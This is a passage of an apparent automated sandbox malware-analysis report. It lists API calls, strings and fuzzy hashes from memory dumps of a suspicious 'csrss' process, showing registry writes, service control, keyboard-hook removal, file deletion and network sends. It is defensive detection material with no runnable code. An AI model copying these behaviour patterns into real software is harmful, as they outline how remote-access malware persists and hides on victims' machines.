                                                        • Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
                                                        • Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA
                                                      • _free.LIBCMT ref: 33D909E6
                                                      • _free.LIBCMT ref: 33D909F8
                                                      • _free.LIBCMT ref: 33D90A0A
                                                      • _free.LIBCMT ref: 33D90A1C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 312fcd471db58850f757a0a0966f7323bfabb09ff82447765eb3b7eccb90c7d1
                                                      • Instruction ID: 025bab3496f06110afb7161efb7d7a113ec5dc1b56c136876c2bed8ef9760227
                                                      • Opcode Fuzzy Hash: 312fcd471db58850f757a0a0966f7323bfabb09ff82447765eb3b7eccb90c7d1
                                                      • Instruction Fuzzy Hash: 4FF012B6904204E79710EA5DF8C2C5A73DDFA04B637A48905F169EBD40DB34FD8546E8
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 1441d2a33ab05da165f257191d36cd83c2aa44899464aea54e78eb510eea9de0
                                                      • Instruction ID: e4f058638f0f9d9163a3d1a3e54f517bcdeb4aa375807747f9ab476d71a5b1e0
                                                      • Opcode Fuzzy Hash: 1441d2a33ab05da165f257191d36cd83c2aa44899464aea54e78eb510eea9de0
                                                      • Instruction Fuzzy Hash: 39D124B9D10326CAEB049F68C881BFAB7B5FF05B00F584159F584AF650D735B982CBA1
                                                      APIs
                                                      • _strpbrk.LIBCMT ref: 33D8E738
                                                      • _free.LIBCMT ref: 33D8E855
                                                        • Part of subcall function 33D7BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D7BD1B
                                                        • Part of subcall function 33D7BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 33D7BD3D
                                                        • Part of subcall function 33D7BD19: TerminateProcess.KERNEL32(00000000), ref: 33D7BD44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                      • String ID: *?$.
                                                      • API String ID: 2812119850-3972193922
                                                      • Opcode ID: a48c11b8db2101b1b15023346f140ef2cd028aedaf42e17176890741c8bd77f5
                                                      • Instruction ID: 85d2646abfc3866321f6f8ac31ed7bbd6e59a4286fc2db9048bec2f697c7497a
                                                      • Opcode Fuzzy Hash: a48c11b8db2101b1b15023346f140ef2cd028aedaf42e17176890741c8bd77f5
                                                      • Instruction Fuzzy Hash: D751A475E00209EFDB04CFA9CC80AADBBB9FF88754F244169D854EB750D675AA018F91
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,33DA6108,33DAC7B0,00000000,00000000,00000000), ref: 33D574F5
                                                        • Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E
                                                      • Sleep.KERNEL32(00000064), ref: 33D57521
                                                      • DeleteFileW.KERNEL32(00000000), ref: 33D57555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                      • String ID: /t
                                                      • API String ID: 1462127192-3161277685
                                                      • Opcode ID: c8c2dcda826e8ad14b808968a71643df190b0fa2214d6d2c4f988121f67a3098
                                                      • Instruction ID: 30cb52dec523c3af208971216120470a095a6725eed34891fecf32e21b46f1ad
                                                      • Opcode Fuzzy Hash: c8c2dcda826e8ad14b808968a71643df190b0fa2214d6d2c4f988121f67a3098
                                                      • Instruction Fuzzy Hash: 54313E72C013199ADF14EBA5DC95EFDB778AF10211F800169E506A7891EF606A8FCAA4
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D8BDC2
                                                      • GetLastError.KERNEL32(?,33D8BC8A,33D7588A,33DAEBB0,0000000C), ref: 33D8BDCC
                                                      • __dosmaperr.LIBCMT ref: 33D8BDF7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID: P?z
                                                      • API String ID: 2583163307-2079540668
                                                      • Opcode ID: 69c84f380b4cd2cf92fa3067586472863923727f7abdfe48b22b1c1c38573a72
                                                      • Instruction ID: d5f3f618fedd27ac2793af5f40cc1956c14e5f8d7317143b8c6d5337c63acada
                                                      • Opcode Fuzzy Hash: 69c84f380b4cd2cf92fa3067586472863923727f7abdfe48b22b1c1c38573a72
                                                      • Instruction Fuzzy Hash: C2012B37A04350B6F3052238F8457AE279D5F82F79F6D451DE876DF1C1DE64A88182A1
                                                      APIs
                                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 33D5381F
                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,33DB52F0,?,33D4F823,pth_unenc,@{t), ref: 33D5384D
                                                      • RegCloseKey.ADVAPI32(?,?,33D4F823,pth_unenc,@{t), ref: 33D53858
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: pth_unenc
                                                      • API String ID: 1818849710-4028850238
                                                      • Opcode ID: a0a24a309a79dd17dba65ef5a8403fbdae65fb067a048b8b30edbce1e7dc6879
                                                      • Instruction ID: df3680bed7d932d214e1e29a3e7c4d59237dd855ce983feaa42513d0d70647db
                                                      • Opcode Fuzzy Hash: a0a24a309a79dd17dba65ef5a8403fbdae65fb067a048b8b30edbce1e7dc6879
                                                      • Instruction Fuzzy Hash: BAF09072940218BBEF109FA1EC45FEE3B6CEF44651F104115F91AA6550EB329B25DBA0
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,33DA6F6C,H#z), ref: 33D5363D
                                                      • RegQueryValueExW.ADVAPI32(33DA6F6C,33D4F313,00000000,00000000,?,00000400), ref: 33D5365C
                                                      • RegCloseKey.ADVAPI32(33DA6F6C), ref: 33D53665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: H#z
                                                      • API String ID: 3677997916-2410801705
                                                      • Opcode ID: 92b2675ba9f50e5d4c0d76ee191fe23ef0001cf2177ba879d75b06e92ed4a925
                                                      • Instruction ID: 1f8899ddfe235838279afb1b829042b55581c1e25abba5e5514a4ae73bf0a45c
                                                      • Opcode Fuzzy Hash: 92b2675ba9f50e5d4c0d76ee191fe23ef0001cf2177ba879d75b06e92ed4a925
                                                      • Instruction Fuzzy Hash: D1F04F76500218FBEF509BA0CC45FDDB7BCEB04700F108095BA55F5250DB715A589BA4
                                                      APIs
                                                      • TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
                                                      • UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
                                                      • TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: TerminateThread$HookUnhookWindows
                                                      • String ID: pth_unenc
                                                      • API String ID: 3123878439-4028850238
                                                      • Opcode ID: 8c5781231a90f703b7934a751b1be9325e43d3d409c3bfb10ff016220c0fb763
                                                      • Instruction ID: b9b5726f30a11a00cdca278ff4643076bb98c7b56928fa98ec0ea00ef7a52ea4
                                                      • Opcode Fuzzy Hash: 8c5781231a90f703b7934a751b1be9325e43d3d409c3bfb10ff016220c0fb763
                                                      • Instruction Fuzzy Hash: C8E01276105356EFDB542FA0C8D88157AEEDB18285354047EF2D356511CE720D14CB50
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 33D52ACD
                                                        • Part of subcall function 33D5B978: GetCurrentProcessId.KERNEL32(00000000,33D9928C,00000000,?,?,?,?,33DA6468,33D4D20D,33DA6F7C), ref: 33D5B99F
                                                        • Part of subcall function 33D58568: CloseHandle.KERNEL32(33D440F5), ref: 33D5857E
                                                        • Part of subcall function 33D58568: CloseHandle.KERNEL32(33DA5E74), ref: 33D58587
                                                      • DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52DC5
                                                      • DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52DFC
                                                      • DeleteFileW.KERNEL32(00000000,33DA5E74,33DA5E74,33DA5E74), ref: 33D52E38
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                      • String ID:
                                                      • API String ID: 1937857116-0
                                                      • Opcode ID: a6d4a51793ceb9c223f918a97f63202ea9fea42fac5c5fa0c857e324f2c74d4b
                                                      • Instruction ID: ad42674151350819cc7673d7efc58c2f2cf84430e3454d400f9c51d38c3bef39
                                                      • Opcode Fuzzy Hash: a6d4a51793ceb9c223f918a97f63202ea9fea42fac5c5fa0c857e324f2c74d4b
                                                      • Instruction Fuzzy Hash: CE0234329483818BD725DB75D890BEFB7E5AFD4200F904D2DE48A87991EF305A4EC762
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: fa5adc363d90c346da196b13896c6d81691097b48ecd6299cf525d8ecdee76a8
                                                      • Instruction ID: a7978fb82f54a94d0b3de53a2feda83363890f1640ade4055ac5d2c732b6054d
                                                      • Opcode Fuzzy Hash: fa5adc363d90c346da196b13896c6d81691097b48ecd6299cf525d8ecdee76a8
                                                      • Instruction Fuzzy Hash: 01A18975E003869FE721CF68C880BAEBBE5FF15350F18416ED9849F281D639AA55C760
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000002,33DACAE0,00000000,00020019,?), ref: 33D5C6B1
                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 33D5C6F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: EnumOpen
                                                      • String ID:
                                                      • API String ID: 3231578192-0
                                                      • Opcode ID: 57e2598bd63b6fa6deed10805f1d463aa1d87ae70dc1b37522cf57957c75ecef
                                                      • Instruction ID: 58c48785b5dbf5f8eee16c4ec3cad80b0abf07f3fa5e13c562128835452b6411
                                                      • Opcode Fuzzy Hash: 57e2598bd63b6fa6deed10805f1d463aa1d87ae70dc1b37522cf57957c75ecef
                                                      • Instruction Fuzzy Hash: 03814F725083419BD724DB24D850EEFB7E8BF94304F50492DA59A83990FF30A94ECBA2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: c927bf04d19367cdd1f83cae4c2114a4edd7673b2d612f9406288f0be772ed05
                                                      • Instruction ID: bbd53970377ab4b16cce1627fd8c0566f019922c795647bdb0fd588c421601c8
                                                      • Opcode Fuzzy Hash: c927bf04d19367cdd1f83cae4c2114a4edd7673b2d612f9406288f0be772ed05
                                                      • Instruction Fuzzy Hash: B8410771E04314AAFB115BF99C80BEE3FA8EF45770F540265F838EB990EA74994147B1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 832531495952a7868a40df19e1a40d4dd7dccecd8b148d00dbf3036f351b4e68
                                                      • Instruction ID: 9afa79705e10efb53c10e48f26b4ec2993e6fa009ba20edf281e72bb8aafb62a
                                                      • Opcode Fuzzy Hash: 832531495952a7868a40df19e1a40d4dd7dccecd8b148d00dbf3036f351b4e68
                                                      • Instruction Fuzzy Hash: 7841D7B6A40704BFE7149F78CC40B9ABBF9EB88710F108A6AF055DFA90D671B54187A0
                                                      APIs
                                                      • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 33D51B8C
                                                      • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 33D51C58
                                                      • SetLastError.KERNEL32(0000007F), ref: 33D51C7A
                                                      • SetLastError.KERNEL32(0000007E,33D51EF0), ref: 33D51C91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorHugeLastRead
                                                      • String ID:
                                                      • API String ID: 3239643929-0
                                                      • Opcode ID: ea7b851bdfffe5debb4f0e55d54eafa4787e2d1a965717e5ce9e7e4cf0dde430
                                                      • Instruction ID: 9dff8f691e9b80c9e112e36a3fa26bc6d73ebfcc9d4e55860342a5beb94a004b
                                                      • Opcode Fuzzy Hash: ea7b851bdfffe5debb4f0e55d54eafa4787e2d1a965717e5ce9e7e4cf0dde430
                                                      • Instruction Fuzzy Hash: A0417BB96043059FFF148F19D985B36B3E8FB48B11F04042DF99ACA651EB72E905CB11
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,33D9D518,00000000,00000000,8B56FF8B,33D844CA,?,00000004,00000001,33D9D518,0000007F,?,8B56FF8B,00000001), ref: 33D91179
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 33D91202
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 33D91214
                                                      • __freea.LIBCMT ref: 33D9121D
                                                        • Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 8ec4534d72d5915b86756f401fac508f271e95d60b4cb7139323fd04d760c30d
                                                      • Instruction ID: ec12b3b7932a6fd7da7e4d0a365c5b657521ddc554b665852e4a3afe2ab14e1d
                                                      • Opcode Fuzzy Hash: 8ec4534d72d5915b86756f401fac508f271e95d60b4cb7139323fd04d760c30d
                                                      • Instruction Fuzzy Hash: 6F31EF76A0020AABEF15DFA4CC81DEE7BA5EF00B10F444169FC04EB290E735CA55CBA0
                                                      APIs
                                                      • EnumDisplayMonitors.USER32(00000000,00000000,33D595CF,00000000), ref: 33D594F5
                                                      • EnumDisplayDevicesW.USER32(?), ref: 33D59525
                                                      • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 33D5959A
                                                      • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 33D595B7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: DisplayEnum$Devices$Monitors
                                                      • String ID:
                                                      • API String ID: 1432082543-0
                                                      • Opcode ID: de90b8350f928a444450ebe4faa1f59974bea69e3d85a08636cccabcd136679a
                                                      • Instruction ID: c75b97537c576a3611699a0261eba5861d6282e3a1615bf2d5b48d3da61ba689
                                                      • Opcode Fuzzy Hash: de90b8350f928a444450ebe4faa1f59974bea69e3d85a08636cccabcd136679a
                                                      • Instruction Fuzzy Hash: 9C216172508304ABD320DE16DC48E9BBBFCEFD1694F50052EB496D3550EF719609C661
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 33D454BF
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4556F
                                                      • TranslateMessage.USER32(?), ref: 33D4557E
                                                      • DispatchMessageA.USER32(?), ref: 33D45589
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,33DB4F78), ref: 33D45641
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 33D45679
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID:
                                                      • API String ID: 2956720200-0
                                                      • Opcode ID: 5cfc2c3788720dd667c94e61fbc7cca40138eb438a08ee2d353196f6df5a1e63
                                                      • Instruction ID: 2837cefa8cd24e7e35d532023a1cb5570b19c37bef5313b6d1527ad0652dcf22
                                                      • Opcode Fuzzy Hash: 5cfc2c3788720dd667c94e61fbc7cca40138eb438a08ee2d353196f6df5a1e63
                                                      • Instruction Fuzzy Hash: 3C219276D04301ABDB00EF75CD998AE77F9AF89640F440A18F96293994EF34D609CB62
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 33D5AC88
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 33D5AC9C
                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 33D5ACA9
                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33D5ACDE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$ChangeCloseConfigHandleManager
                                                      • String ID:
                                                      • API String ID: 110783151-0
                                                      • Opcode ID: 138e013c1d0c106902ebb3f54bad2f90809593aedf5fd4874b3e762300461910
                                                      • Instruction ID: 857c045556748203d54a41b837de2af4493ac0c2c0114f38ff444e797c331467
                                                      • Opcode Fuzzy Hash: 138e013c1d0c106902ebb3f54bad2f90809593aedf5fd4874b3e762300461910
                                                      • Instruction Fuzzy Hash: 8501D27A1443257BFB125B2DCC4AEBA3BACDB42670F010205F97AE65C0DF609A0695A1
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 33D5C4B2
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D5C4D7
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5C4E5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 3919263394-0
                                                      • Opcode ID: 58f8c5b3297ad85847667f17f58d04a24476e30a0d29957506864655d6eb2a8b
                                                      • Instruction ID: 2399de813a3ba81ec30ef122cb0c341073b6cf883aecd2c14d4c9f9b59032604
                                                      • Opcode Fuzzy Hash: 58f8c5b3297ad85847667f17f58d04a24476e30a0d29957506864655d6eb2a8b
                                                      • Instruction Fuzzy Hash: ECF062B66423187FF6106B35EC84EBB379CEB86AA5F000229F942B32C0CB255D0A9131
                                                      APIs
                                                      • AllocConsole.KERNEL32 ref: 33D5CDA4
                                                      • GetConsoleWindow.KERNEL32 ref: 33D5CDAA
                                                      • ShowWindow.USER32(00000000,00000000), ref: 33D5CDBD
                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 33D5CDE2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Console$Window$AllocOutputShow
                                                      • String ID:
                                                      • API String ID: 4067487056-0
                                                      • Opcode ID: d8286828e8a0d9ca0ec5bf71621fd6fe87ce4c5f08d467d9bb073936ce198e2b
                                                      • Instruction ID: 400721e45b5d1dad577c269cbbc801c234a72f10fdfd7010a620e146fae1be4c
                                                      • Opcode Fuzzy Hash: d8286828e8a0d9ca0ec5bf71621fd6fe87ce4c5f08d467d9bb073936ce198e2b
                                                      • Instruction Fuzzy Hash: C0012CB2D42308AEDA10FBF8CD49F8D77ACAF14641F500461B614EB482EBB5A61C8A75
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 33D7987A
                                                        • Part of subcall function 33D79EB2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 33D79EE1
                                                        • Part of subcall function 33D79EB2: ___AdjustPointer.LIBCMT ref: 33D79EFC
                                                      • _UnwindNestedFrames.LIBCMT ref: 33D79891
                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 33D798A3
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 33D798C7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                      • String ID:
                                                      • API String ID: 2901542994-0
                                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                      • Instruction ID: b2cf0bc5507018ffb27b75620de57d3e93a51bbcb483c4a2d25d1016d06f90c2
                                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                      • Instruction Fuzzy Hash: 3001E532400209BBCF129F55CC00EDA3BBAFF88754F058125FA5966620C736E8A1DBA0
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 33D5ABB9
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 33D5ABCD
                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 33D5ABDA
                                                      • ControlService.ADVAPI32(00000000,00000002,?), ref: 33D5ABE9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$CloseControlHandleManager
                                                      • String ID:
                                                      • API String ID: 1243734080-0
                                                      • Opcode ID: bf3b5a896f1dc38693045663bc596073c569bcbc7a5fda14eaf666f80cdaeac8
                                                      • Instruction ID: 061b46c70d5b9880422e81e2f9f71df7fe3f04a408a55cd32f0103e6244ff5f7
                                                      • Opcode Fuzzy Hash: bf3b5a896f1dc38693045663bc596073c569bcbc7a5fda14eaf666f80cdaeac8
                                                      • Instruction Fuzzy Hash: 2CF0C2325002286BE7217B25CC89EBF3BACDB45651F410015FE1EE2141EF348D1685F1
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 33D5AAB5
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 33D5AAC9
                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AAD6
                                                      • ControlService.ADVAPI32(00000000,00000001,?), ref: 33D5AAE5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$CloseControlHandleManager
                                                      • String ID:
                                                      • API String ID: 1243734080-0
                                                      • Opcode ID: a564b7640006588e17d1140c93529fc9027091beed7dffa435dee88013b5c8e5
                                                      • Instruction ID: 343aa8847993be2b8cccd77d1e8966aa9296b82ba0dcb0d377f71dc06a824725
                                                      • Opcode Fuzzy Hash: a564b7640006588e17d1140c93529fc9027091beed7dffa435dee88013b5c8e5
                                                      • Instruction Fuzzy Hash: AAF0C2325403286BE721BB25CC89EBF3BACDB45651F010015FD1AE2141DF748D5785F0
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 33D5AC20
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 33D5AC34
                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AC41
                                                      • ControlService.ADVAPI32(00000000,00000003,?), ref: 33D5AC50
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$CloseControlHandleManager
                                                      • String ID:
                                                      • API String ID: 1243734080-0
                                                      • Opcode ID: 927e12c477ad3e937fe87eb629c46229ca887ffef62b8d56d953e46a9e60c5ab
                                                      • Instruction ID: 0f112cecce39ede1d20334097ee109feefd3cd59dbf3082174cb39a1c9c053f7
                                                      • Opcode Fuzzy Hash: 927e12c477ad3e937fe87eb629c46229ca887ffef62b8d56d953e46a9e60c5ab
                                                      • Instruction Fuzzy Hash: 09F0C2365002286BE721BB29CC89EBF3BACDB45651F010015FE1EE6141DF348D1685F0
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,33D5A6A0,00000000), ref: 33D5AA53
